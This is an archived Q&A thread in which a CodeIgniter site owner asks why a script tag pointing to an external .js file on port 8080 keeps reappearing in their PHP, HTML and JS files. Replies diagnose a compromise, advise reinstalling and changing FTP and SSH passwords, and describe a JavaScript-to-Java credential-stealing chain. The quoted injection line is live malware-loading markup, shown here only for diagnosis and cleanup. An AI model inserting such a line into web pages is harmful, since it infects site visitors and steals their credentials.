tags:

views:

146

answers:

2
Q: 

another url link on my website

hi to all

I have a problem with my website. I don't why the index.php was being inserted with the script below. This index.php is part of codeigniter, the framework that I was currently used. Is this inserted thru accessing ftp or thru code. After I was deleted this script I noticed that on the lower left of my browser there is another url being read. I don't know how to trace this because I tried to find this url but I couldn't see it. Please help me

I encountered this scenario twice.

Any suggestion would greatly appreciated.

 <script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"&gt;&lt;/script&gt;
 <!--11428cb2b3b67368730c012cb53eb247-->
+1  A: 

Your site has probably been compromised by an attacker. This sort of thing can happen if you have any folders that are world-writable (check your folder permissions). Also check for new files that weren't there before (they could be named anything and could be in any folder within the site's root folder).

For some more info on similar attacks, see:

http://forums.techguy.org/virus-other-malware-removal/871970-strange-b1-html-tag-embedding.html

and

http://www.phpfreaks.com/forums/index.php/topic,274404.msg1297647.html#msg1297647

Ash White  2010-07-09 04:07:35
hi thanks for your replyI mean at the end of my php, html and js that script has been inserted. I tried to replace all the file but after an hour it was attacked again. I'll checked file attributes of my folder in ftp and only owner permission has been check. I tried to look at the forums link you provided but I couldn't find any clear solution.thanks a lot
tirso  2010-07-09 08:05:56
Changing the affected files won't fix anything. You need to eradicate the script(s) that were uploaded into the site's folder (there could be one or many).Honestly, the best way to handle it is probably to start with installation of Code Ignitor and then manually bring in any changes/additions you made to the codebase. Otherwise you might miss one of the malicious scripts and be back to square one.
Ash White  2010-07-13 01:30:13
A: 

Hey guys I got some info here: http://www.everythingilike.com/roundstorm-ftp-hack-solution

Basically the js hack inserts a java app which executes. This java app scans your FTP info and even any Shell/SSH login information. I suggest changing all your passwords after the clean up.

Alberto  2010-07-14 16:13:35
I think you mean Javascript
stef  2010-07-14 18:14:12
The hack consists of both Javascript and Java. Initially the Javascript is executed via the browser which embeds the Java applet into the web page. The Java applet contains the main nuts/bolts which scans the users pc for passwords and installs itself onto the system.
Alberto  2010-07-14 21:13:02

related questions

IDE suggestions: Eclipse IDE vs. Zend Studio ( confused )
MySQL/Apache Error in PHP MySQL query
Lightweight IDE for Linux
What PHP framework would you choose for a new application and why?
Why is my ternary expression not working?
How can I get at the matches when using preg_replace in PHP?
Mechanisms for tracking DB schema changes
Wordpress theme development offline tools
Using object property as default for method property
How can I get the authenticated user name under Apache using plain HTTP authentication and PHP?
Make XAMPP/Apache serve file outside of htdocs
How do you debug PHP scripts?
PHP Variables passed by value or by reference?
Best way to implement unit testing in PHP
Connect PHP to an AS/400
Best way to access Exchange using PHP?
PHP Session Security
How do I access a remote form in php?
What's the best way to generate a tag cloud from an array? (using h1 through h6 for sizing)
Apache/PHP: error_log per Virtual Host?
How do I track file downloads with apache/PHP
How would you access Object properties from within an object method?
Flat File Databases in PHP
Best way to allow plugins for a PHP application
Latest information on PHP upcoming releases